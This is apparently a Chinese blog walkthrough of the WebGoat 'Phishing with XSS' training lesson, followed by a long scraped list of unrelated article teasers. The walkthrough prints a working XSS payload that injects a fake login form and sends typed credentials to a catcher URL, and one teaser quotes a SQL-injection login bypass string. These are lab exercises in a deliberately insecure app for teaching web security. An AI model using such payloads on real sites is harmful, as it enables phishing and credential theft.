lay_loge
lay_loge

跨站脚本攻击——使用XSS钓鱼

一、题目
This lesson is an example of how a website might support a phishing attack

Below is an example of a standard search feature.
Using XSS and HTML insertion, your goal is to:

Insert html to that requests credentials
Add javascript to actually collect the credentials
Post the credentials to http://localhost/WebGoat/catcher?PROPERTY=yes...

To pass this lesson, the credentials must be posted to the catcher servlet.
使用XSS和HTML注入,你的目标:
(1)将html插入请求凭据
(2)插入javascript以实际收集凭据
(3)将凭据发送到http://localhost/WebGoat/catcher?PROPERTY=yes…

为了通过这次实验,必须将凭据发送到捕获器servlet

二、课程目标
(1)技术概念
It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. With the help of XSS you can do a Phishing Attack and add content to a page which looks official. It is very hard for a victim to determinate that the content is malicious.
在服务端对所有输入进行验证总是不错的做法。在HTTP响应中,使用未经验证的用户输入时,可能会发生XSS漏洞。利用XSS,你可以实现钓鱼攻击并将内容添加到看似正常的页面。对于受害者来说,确定内容是恶意的是很困难的。

(2)课程目标
The user should be able to add a form asking for username and password. On submit the input should be sent to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
用户应当能够添加一个请求用户名与密码的表单。将数据提交到http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName

三、操作步骤
(1)利用XSS漏洞,在页面中新增一个表单,插入如下代码,点击search

在这里插入图片描述
界面效果:
跨站脚本攻击——使用XSS钓鱼_第1张图片
(2)利用脚本读取表单上获取的用户名和密码,并将数据发送给攻击者。
< script>
function hack(){
alert("Had this been a real attack…Your credentials were just stolen.“User Name=”+document.forms[0].user.value+“Password=”+documment.forms[0].pass.value);XSSImage=new Image;XSSImage.src=“http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value+"&password="+document.forms[0].pass.value+"”;
}
< /script>
(3)将两段代码结合使用
< script>function hack(){ alert("Had this been a real attack… Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src=“http://localhost/WebGoat/catcher?PROPERTY=yes&user=”+ document.forms[0].user.value + “&password=” + document.forms[0].pass.value + “”;} < /script>< form>< br>< br>< HR>< H3>This feature requires account login:< /H3 >< br>< br>Enter Username:< br>< input type=“text” id=“user” name=“user”>< br>Enter Password:< br>< input type=“password” name = “pass”>< br>< input type=“submit” name=“login” value=“login” οnclick=“hack()”>< /form>< br>< br>< HR>

(4)点击search按钮,并输入用户名及密码,点击login按钮,查看效果。
跨站脚本攻击——使用XSS钓鱼_第2张图片点击login按钮
跨站脚本攻击——使用XSS钓鱼_第3张图片

你可能感兴趣的:(WebGoat)

  • 网络安全工具汇总 Hacker_Fuchen web安全安全
    网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.
  • 网络安全在线网站/靶场:全面探索与实践 小熊同学哦 网络安全web安全安全网络网络安全系统安全计算机网络
    目录1.CyberPatriot简介功能与特点适用人群2.HackTheBox简介功能与特点适用人群3.OverTheWire简介功能与特点适用人群4.VulnHub简介功能与特点适用人群5.PortSwiggerWebSecurityAcademy简介功能与特点适用人群6.TryHackMe简介功能与特点适用人群7.CTFTime简介功能与特点适用人群8.WebGoat简介功能与特点适用人群结论
  • Web 漏洞训练平台学习笔记(webgoat & juice shop) Beethen Tang 前端学习docker安全
    Web漏洞训练平台实验目的了解常见Web漏洞训练平台;了解常见Web漏洞的基本原理;掌握OWASPTop10及常见Web高危漏洞的漏洞检测、漏洞利用和漏洞修复方法;实验环境WebGoat/Juiceshopkali2021.2实验要求每个实验环境完成不少于5种不同漏洞类型的漏洞利用练习(可选)使用不同于官方教程中的漏洞利用方法完成目标漏洞利用练习(可选)最大化漏洞利用效果实验(可选)定位缺陷代码(
  • 小迪安全21WEB 攻防-JavaWeb 项目&JWT 身份攻击&组件安全&访问控制 yiqiqukanhaiba 安全
    #知识点:1、JavaWeb常见安全及代码逻辑2、目录遍历&身份验证&逻辑&JWT3、访问控制&安全组件&越权&三方组件Java:大部分都是第三方插件出现漏洞webgoat的搭建:——java靶场JDK版本要求:11.0以上需先启动webgoat-server:java-jarwebgoat-server-8.1.0.jar--server.port=8080然后访问http://127.0.0.
  • Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译 LaPluie985 安全web安全javapython网络安全
    知识点:1、JavaWeb常见安全及代码逻辑2、目录遍历&身份验证&逻辑&JWT3、访问控制&安全组件&越权&三方组件案例演示:JavaWeb-WebGoat8靶场搭建使用安全问题-目录遍历&身份认证-JWT攻击安全问题-访问控制&安全组件-第三方组件环境下载地址:GitHub-WebGoat/WebGoat:WebGoatisadeliberatelyinsecureapplication(安装
  • JAVA漏洞简单总结 carrot11223 网络安全java开发语言漏洞jwt
    第一部分:Javaweb常见安全及代码漏洞以开源项目webgoat-server-8.1.0为例,可以在GitHub上看到,直接可以下载jar包,在本地准备jdk环境,使用以下命令进行启动:java-jarwebgoat-server-8.1.0.jar--server.port=9091WebGoat版本可能是用Java11或更高版本编译的,因此无法在Java8上运行。再下一个麻烦,直接用ide
  • 38-WEB漏洞-反序列化之PHP&JAVA全解(下) 月亮今天也很亮 小迪安全web安全学习前端phpjava
    WEB漏洞-反序列化之PHP&JAVA全解(下)一、Java中API实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb靶场反序列化测试3.4、2020-网鼎杯-朱雀组-Web-think_java真题复现四、涉及资源一、Java中API实现二、序列化理解序列化(Serialization):将对象的状态信息转换为可以存储或传输
  • WebGoat8.2.2通关记录一(General、Injection) fiskeryang 安全性测试
    安装与部署#安装dockerpullwebgoat/goatandwolf#启动sudodockerrun-d-p6870:8888-p6869:8080-p6871:9090webgoat/goatandwolf我下载webgoat版本经常无法自动启动webwolf,需要进入到容器命令函手动启动dockerexec-it-urootfervent_carsonbashshstart.sh准备工具
  • VM中kali虚拟机创建docker部署WebGoat d0ublεU0x00 docker容器网络安全
    这里选择在docker中配置(因为方便)首先下载dockersudoapt-getinstalldocker.io然后从DockerHub下载WebGoat8.0的docker镜像使用命令dockerpullwebgoat/webgoat-8.0完成后查看现在kali虚拟机中的docker镜像列表输入命令dockerimages这里看见已经有了这个webgoat-8.0的镜像现在创建一个docke
  • WebGoat 指定端口号 爱博客大伯 安全攻防#webgoatwebgoat
    文章目录新版本的WebGoat旧版本WebGoat新版本的WebGoat使用WEBGOAT_PORT指定WebGoat的端口号使用WEBWOLF_PORT指定WebWolf的端口号java-DWEBGOAT_PORT=8081-jarwebgoat-2023.8.jarjava-DWEBGOAT_PORT=8081-DWEBWOLF_PORT=9091-jarwebgoat-2023.8.jarW
  • 2020-02-12Jsp挖掘(6)-JSP命令执行漏洞 thelostworldSec
    JSP命令执行漏洞一、代码执行成因调用Runtime但是没有对传入参数没有过滤和限制:jsp调用命令行的只需要在中编写使用Runtime类即可调用命令行Windows用“&”,linux用“;”号来分隔多条命令'cmd.exe/ctype"E:\jsp\WebGoat-5.3_RC1\tomcat\webapps\webgoat\lesson_plans\English\BasicAuthenti
  • Token 绕过 / JWT漏洞 / 垂直越权 / WebGoat–JWT靶场 tokens–4、5、7 关 gjl_ 网络安全web安全笔记安全
    Cookie、Session和Token都是用于在Web应用程序中进行身份验证和状态管理的工具Cookie存储在客户端缺点:容易被盗取Session存储在服务器缺点:如双十一等大量用户访问时,服务器需要存储查询大量Session,查询速度慢资源开销大,对性能也会产生影响Token存储在客户端,解决了大量Session存储在服务器访问速度慢的问题加密JWT概述jsonwebtokenjson是一种数
  • JWT安全及WebGoat靶场 西柠! 安全网络安全
    JWT安全cookie(放在浏览器)cookie是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据,仅仅是浏览器实现的一种数据存储功能。cookie由服务器生成,发送给浏览器,浏览器把cookie以kv形式保存到某个目录下的文本文件内,下一次请求同一网站时会把该cookie发送给服务器。由于cookie是存在客户端上的,所以浏览器加入了一些限制确保cookie不会被恶意使用,同时不会占据
  • webgoat-Cross Site Scripting XSS 跨站脚本攻击 测试开发-东方不败之鸭梨 安全测试web安全安全
    01概念本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。目标了解什么是XSS,XSS如何工作?学习反射型XSS及注入,基于DOM的XSS注入02WhatisXSS?Cross-SiteScripting也叫XSS是一种漏洞,允许将未经编码或者过滤的HTML或者script标签作为输入渲染至浏览器。Cross-SiteScripting(XSS)isthemostprevalent
  • sonar对webgoat进行静态扫描 测试开发-东方不败之鸭梨 安全测试java开发语言
    安装sonar并配置docker安装sonarqube,sonarQube静态代码扫描-Joson6350-博客园(cnblogs.com)对webgoat进行sonar扫描扫描结果bugsChangethisconditionsothatitdoesnotalwaysevaluateto"false"意思是这里的elseif语句不会执行,因为ipAddressKnow为true,所以if和els
  • WebGoat通关攻略之 SQL Injection (intro) Mr. G K WebGoatWebGoat
    SQLInjection(intro)1.WhatisSQL?本题练习SQL查询语句,就是写一句SQL获取叫BobFranco所在的departmentSELECTdepartmentFROMemployeesWHEREfirst_name='Bob'ANDlast_name='Franco'成功通关!2.DataManipulationLanguage(DML)本题练习的是Update修改数据,
  • webgoat-Challenges 测试开发-东方不败之鸭梨 安全测试服务器运维
    AdminLostpassword这一题密码藏在logo图片里请求GET/WebGoat/challenge/logo搜索admin看到密码,使用账号admin和这个密码登录拿到flagWithoutpassword题目要求:在不知道Larry的密码情况下登录考虑使用SQL注入密码输入123'or1=1--Adminpasswordreset随便输入admin开头的邮箱,抓包,把host地址改为w
  • webgoat通关汇总文章 测试开发-东方不败之鸭梨 安全测试运维
    BrokenAccessControllwebgoat-BrokenAccessControlI访问控制失效-CSDN博客CryptographicFailures加密解密基础知识CryptoBasics-CSDN博客Injectionwebgoat-(A1)SQLInjection-CSDN博客XSSwebgoat-Pathtraversal目录遍历-CSDN博客SecurityMisconfi
  • linux部署webgoat catch that elf 安全环境安装linuxwebgoat部署靶机
    文章目录程序包准备上传部署程序包准备github上下载程序包,如果太慢可以点击下载webgoat-server-8.2.2.jar上传部署将包上传到服务器上,需要说明该包依赖java环境且对java版本要求较高,我们这里是用java17进行部署,需要提前配置好java17配置java环境java部署过程参见linux部署java执行java-version看到java版本信息标识java环境配置成
  • 在Ubuntu环境下使用docker配置webgoat环境 xian_wwq 部署安全JAVAdockerwebgoatubuntu
    1.安装Docker环境sudoaptinstalldocker.io2.配置Docker加速打开配置文件vim/etc/docker/daemon.json添加mirrors信息{"registry-mirrors":["https://registry.docker-cn.com","http://hub-mirror.c.163.com"]}3.重启dockersystemctldaemon
  • 代码审计(Java)——WebGoat_RequestForgeries wavesky111 代码审计java开发语言
    一、Cross-siteRequestForgeries1.level3这里的level3,就是限制了Referer的参数值为空或者是不等于host即可,单纯为了教学而设计的题目,没啥可说的~因为java功底有限,待我再研究研究token怎么整,这里先按照简单的referer校验源头校验修复,后面再把这个token修复放上(太菜了……)ok这里就简单的修复完成了,规定referer同源有一个致命的
  • webgoat环境搭建 weixin_30588675 开发工具java
    链接:https://pan.baidu.com/s/1gfEKIyB密码:5zdq1:配置Java环境变量,过程请找度娘2:解压下载好的tomcat3:将webgoat-container-7.0.1.war文件copy到tomcat中的webapps目录下4:打开tomcat中bin文件夹下的startup.bat文件,之后webapps下会多出一个名为webgoat-container-7.
  • webgoat7.1开发版环境搭建 weixin_30909575 gitjava
    环境准备:gitmavenjdktomcat然后进入正文:下载webgoat门户cd~/webgoatgitclonehttps://github.com/WebGoat/WebGoat.gitgitclonehttps://github.com/WebGoat/WebGoat-Lessons.gitcdWebGoatgitcheckout7.1mvncleancompileinstallcd..
  • WebGoat靶场漏洞环境搭建Jar版 北岸冷若冰霜 #靶场安全安全漏洞安全linux
    WebGoat靶场漏洞环境搭建Jar版项目地址https://github.com/WebGoat/WebGoat环境描述Linux:Ubuntu16.04.6LTSJava版本:jdk-13.0.2WebGoat:webgoat-server-8.0.0.M26环境WebGoat1.更新源sudo-iapt-getupdate&&apt-getcleanaptinstall-ycurlgit2.
  • 带你快速搭建靶场漏洞环境|WebGoat之Jar版 万天峰 jarubuntulinux
    WebGoatisadeliberatelyinsecurewebapplicationmaintainedbyOWASPdesignedtoteachwebapplicationsecuritylessons.Thisprogramisademonstrationofcommonserver-sideapplicationflaws.Theexercisesareintendedtobeused
  • docker安装webgoat 天下是个小趴菜 webgoatdockerjavalinux
    docker安装webgoat一般来说无需docker,在https://github.com/WebGoat/WebGoat/releases中,下载最新的v8.2.2.jar,然后java-jarwebgoat-server-8.2.2.jar然后反问http://127.0.0.1/WebGoat即可但是,由于本人windows主机(java10.0.2)和kali虚拟机(1.8和11.0)
  • 当我安装第n次 WebGoat 8.2.2终于成功了!!!(Windows) 159的小韭菜 安装合集java开发语言
    安装一直发生错误,一般不行就是java版本不行和webgoat不匹配,可以试试多下几个版本,建议用最新版webgoat(这里是webgoat8.2.2.jar+jdk-18.0.2.1版本)我这个小菜鸡,哎明明很简单的,咳咳....不能让大家发现我太蠢了,开始吧1、首先是在github.com下载了webgoat8.2.2.2.jar文件(大致名字是这样,没细看),然后也按照要求,有下过java1
  • WebGoat环境搭建 Mr. G K WebGoatWebGoat
    首先安装jdk,此步骤省略…验证直接打开cmd,输入以下命令:java-version(可以查看安装的JDK版本。)javac(查看java文件编译成的class文件)WebGoat下载WebGoat的下载地址:Releases·WebGoat/WebGoat·GitHub下载后存放在任意位置,例如:D:\webgoat打开CMD,先进入到安装目录下然后运行webgoat,windows下用命令j
  • 1021.安全资源共享 weixin_30906671 运维rubyweb安全
    Web安全视频Online-Security-Videos–红日Web安全攻防视频Online-Security-Videos–西安鹏程网络安全攻防课程Online-Security-Videos–Vulhub系列视频Online-Security-Videos–米斯特Web安全攻防视频Online-Security-Videos–SSRF漏洞利用与getshell实战渗透测试靶场WebGoat–
  • WebGoat教程学习(六)--日志欺骗(Log Spoofing) weixin_30693683 java
    Thegreyareabelowrepresentswhatisgoingtobeloggedinthewebserver'slogfile.*Yourgoalistomakeitlikeausername"admin"hassucceededintologgingin.*Elevateyourattackbyaddingascripttothelogfile.灰色框框的部分是日志输出部分,日志的
  • C/C++Win32编程基础详解视频下载 择善Zach 编程C++Win32
    课题视频:C/C++Win32编程基础详解 视频知识:win32窗口的创建                   windows事件机制 主讲:择善Uncle老师 学习交流群:386620625 验证码:625 --
  • Guava Cache使用笔记 bylijinnan javaguavacache
    1.Guava Cache的get/getIfPresent方法当参数为null时会抛空指针异常 我刚开始使用时还以为Guava Cache跟HashMap一样,get(null)返回null。 实际上Guava整体设计思想就是拒绝null的,很多地方都会执行com.google.common.base.Preconditions.checkNotNull的检查。 2.Guava
  • 解决ora-01652无法通过128(在temp表空间中) 0624chenhong oracle
    解决ora-01652无法通过128(在temp表空间中)扩展temp段的过程 一个sql语句后,大约花了10分钟,好不容易有一个结果,但是报了一个ora-01652错误,查阅了oracle的错误代码说明:意思是指temp表空间无法自动扩展temp段。这种问题一般有两种原因:一是临时表空间空间太小,二是不能自动扩展。 分析过程:    既然是temp表空间有问题,那当
  • Struct在jsp标签 不懂事的小屁孩 struct
    非UI标签介绍: 控制类标签: 1:程序流程控制标签   if   elseif    else <s:if test="isUsed"> <span class="label label-success">True</span> </
  • 按对象属性排序 换个号韩国红果果 JavaScript对象排序
    利用JavaScript进行对象排序,根据用户的年龄排序展示 <script> var bob={ name;bob, age:30 } var peter={ name;peter, age:30 } var amy={ name;amy, age:24 } var mike={ name;mike, age:29 } var john={
  • 大数据分析让个性化的客户体验不再遥远 蓝儿唯美 数据分析
    顾客通过多种渠道制造大量数据,企业则热衷于利用这些信息来实现更为个性化的体验。 分析公司Gartner表示,高级分析会成为客户服务的关键,但是大数据分析的采用目前仅局限于不到一成的企业。 挑战在于企业还在努力适应结构化数据,疲于根据自身的客户关系管理(CRM)系统部署有效的分析框架,以及集成不同的内外部信息源。 然而,面对顾客通过数字技术参与而产生的快速变化的信息,企业需要及时作出反应。要想实
  • java笔记4 a-john java
    操作符 1,使用java操作符       操作符接受一个或多个参数,并生成一个新值。参数的形式与普通的方法调用不用,但是效果是相同的。加号和一元的正号(+)、减号和一元的负号(-)、乘号(*)、除号(/)以及赋值号(=)的用法与其他编程语言类似。       操作符作用于操作数,生成一个新值。另外,有些操作符可能会改变操作数自身的
  • 从裸机编程到嵌入式Linux编程思想的转变------分而治之:驱动和应用程序 aijuans 嵌入式学习
        笔者学习嵌入式Linux也有一段时间了,很奇怪的是很多书讲驱动编程方面的知识,也有很多书将ARM9方面的知识,但是从以前51形式的(对寄存器直接操作,初始化芯片的功能模块)编程方法,和思维模式,变换为基于Linux操作系统编程,讲这个思想转变的书几乎没有,让初学者走了很多弯路,撞了很多难墙。     笔者因此写上自己的学习心得,希望能给和我一样转变
  • 在springmvc中解决FastJson循环引用的问题 asialee 循环引用fastjson
              我们先来看一个例子:           package com.elong.bms; import java.io.OutputStream; import java.util.HashMap; import java.util.Map; import co
  • ArrayAdapter和SimpleAdapter技术总结 百合不是茶 androidSimpleAdapterArrayAdapter高级组件基础
    ArrayAdapter比较简单,但它只能用于显示文字。而SimpleAdapter则有很强的扩展性,可以自定义出各种效果   ArrayAdapter;的数据可以是数组或者是队列        // 获得下拉框对象 AutoCompleteTextView textview = (AutoCompleteTextView) this
  • 九封信 bijian1013 人生励志
            有时候,莫名的心情不好,不想和任何人说话,只想一个人静静的发呆。有时候,想一个人躲起来脆弱,不愿别人看到自己的伤口。有时候,走过熟悉的街角,看到熟悉的背影,突然想起一个人的脸。有时候,发现自己一夜之间就长大了。         2014,写给人
  • Linux下安装MySQL Web 管理工具phpMyAdmin sunjing PHPInstallphpMyAdmin
    PHP http://php.net/ phpMyAdmin http://www.phpmyadmin.net Error compiling PHP on CentOS x64   一、安装Apache 请参阅http://billben.iteye.com/admin/blogs/1985244   二、安装依赖包 sudo yum install gd
  • 分布式系统理论 bit1129 分布式
    FLP One famous theory in distributed computing, known as FLP after the authors Fischer, Lynch, and Patterson, proved that in a distributed system with asynchronous communication and process crashes,
  • ssh2整合(spring+struts2+hibernate)-附源码 白糖_ eclipsespringHibernatemysql项目管理
    最近抽空又整理了一套ssh2框架,主要使用的技术如下: spring做容器,管理了三层(dao,service,actioin)的对象 struts2实现与页面交互(MVC),自己做了一个异常拦截器,能拦截Action层抛出的异常 hibernate与数据库交互 BoneCp数据库连接池,据说比其它数据库连接池快20倍,仅仅是据说 MySql数据库   项目用eclipse
  • treetable bug记录 braveCS table
    // 插入子节点删除再插入时不能正常显示。修改: //不知改后有没有错,先做个备忘 Tree.prototype.removeNode = function(node) { // Recursively remove all descendants of +node+ this.unloadBranch(node); // Remove
  • 编程之美-电话号码对应英语单词 bylijinnan java算法编程之美
    import java.util.Arrays; public class NumberToWord { /** * 编程之美 电话号码对应英语单词 * 题目: * 手机上的拨号盘,每个数字都对应一些字母,比如2对应ABC,3对应DEF.........,8对应TUV,9对应WXYZ, * 要求对一段数字,输出其代表的所有可能的字母组合
  • jquery ajax读书笔记 chengxuyuancsdn jQuery ajax
    1、jsp页面 <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <% String path = request.getContextPath(); String basePath = request.getScheme()
  • JWFD工作流拓扑结构解析伪码描述算法 comsci 数据结构算法工作活动J#
      对工作流拓扑结构解析感兴趣的朋友可以下载附件,或者下载JWFD的全部代码进行分析   /*  流程图拓扑结构解析伪码描述算法         public java.util.ArrayList DFS(String graphid, String stepid, int j)
  • oracle I/O 从属进程 daizj oracle
    I/O 从属进程   I/O从属进程用于为不支持异步I/O的系统或设备模拟异步I/O.例如,磁带设备(相当慢)就不支持异步I/O.通过使用I/O 从属进程,可以让磁带机模仿通常只为磁盘驱动器提供的功能。就好像支持真正的异步I/O 一样,写设备的进程(调用者)会收集大量数据,并交由写入器写出。数据成功地写出时,写入器(此时写入器是I/O 从属进程,而不是操作系统)会通知原来的调用者,调用者则会
  • 高级排序:希尔排序 dieslrae 希尔排序
    public void shellSort(int[] array){ int limit = 1; int temp; int index; while(limit <= array.length/3){ limit = limit * 3 + 1;
  • 初二下学期难记忆单词 dcj3sjt126com englishword
    kitchen 厨房 cupboard 厨柜 salt 盐 sugar 糖 oil 油 fork 叉;餐叉 spoon 匙;调羹 chopsticks 筷子 cabbage 卷心菜;洋白菜 soup 汤 Italian 意大利的   Indian 印度的 workplace  工作场所 even 甚至;更 Italy 意大利 laugh 笑 m
  • Go语言使用MySQL数据库进行增删改查 dcj3sjt126com mysql
    目前Internet上流行的网站构架方式是LAMP,其中的M即MySQL, 作为数据库,MySQL以免费、开源、使用方便为优势成为了很多Web开发的后端数据库存储引擎。MySQL驱动Go中支持MySQL的驱动目前比较多,有如下几种,有些是支持database/sql标准,而有些是采用了自己的实现接口,常用的有如下几种: http://code.google.c...o-mysql-dri
  • git命令 shuizhaosi888 git
    ---------------设置全局用户名: git config --global user.name "HanShuliang" //设置用户名 git config --global user.email "[email protected]" //设置邮箱 ---------------查看环境配置 git config --li
  • qemu-kvm 网络 nat模式 (四) haoningabc kvmqemu
    qemu-ifup-NAT #!/bin/bash BRIDGE=virbr0 NETWORK=192.168.122.0 GATEWAY=192.168.122.1 NETMASK=255.255.255.0 DHCPRANGE=192.168.122.2,192.168.122.254 TFTPROOT= BOOTP= function check_bridge()
  • 不要让未来的你,讨厌现在的自己 jingjing0907 生活 奋斗 工作 梦想
     故事one  23岁,他大学毕业,放弃了父母安排的稳定工作,独闯京城,在家小公司混个小职位,工作还算顺手,月薪三千,混了混,混走了一年的光阴。    24岁,有了女朋友,从二环12人的集体宿舍搬到香山民居,一间平房,二人世界,爱爱爱。偶然约三朋四友,打扑克搓麻将,日子快乐似神仙;    25岁,出了几次差,调了两次岗,薪水涨了不过百,生猛狂飙的物价让现实血淋淋,无力为心爱银儿购件大牌
  • 枚举类型详解 一路欢笑一路走 enum枚举详解enumsetenumMap
    枚举类型详解 一.Enum详解      1.1枚举类型的介绍   JDK1.5加入了一个全新的类型的”类”—枚举类型,为此JDK1.5引入了一个新的关键字enum,我们可以这样定义一个枚举类型。      Demo:一个最简单的枚举类   public enum ColorType { RED
  • 第11章 动画效果(上) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Eclipse中jsp、js文件编辑时,卡死现象解决汇总 ljf_home eclipsejsp卡死js卡死
    使用Eclipse编辑jsp、js文件时,经常出现卡死现象,在网上百度了N次,经过N次优化调整后,卡死现象逐步好转,具体那个方法起到作用,不太好讲。将所有用过的方法罗列如下:   1、取消验证 windows–>perferences–>validation 把 除了manual 下面的全部点掉,build下只留 classpath dependency Valida
  • MySQL编程中的6个重要的实用技巧 tomcat_oracle mysql
    每一行命令都是用分号(;)作为结束 对于MySQL,第一件你必须牢记的是它的每一行命令都是用分号(;)作为结束的,但当一行MySQL被插入在PHP代码中时,最好把后面的分号省略掉,例如: mysql_query("INSERT INTO tablename(first_name,last_name)VALUES('$first_name',$last_name')");
  • zoj 3820 Building Fire Stations(二分+bfs) 阿尔萨斯 Build
    题目链接:zoj 3820 Building Fire Stations 题目大意:给定一棵树,选取两个建立加油站,问说所有点距离加油站距离的最大值的最小值是多少,并且任意输出一种建立加油站的方式。 解题思路:二分距离判断,判断函数的复杂度是o(n),这样的复杂度应该是o(nlogn),即使常数系数偏大,但是居然跑了4.5s,也是醉了。 判断函数里面做了3次bfs,但是每次bfs节点最多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他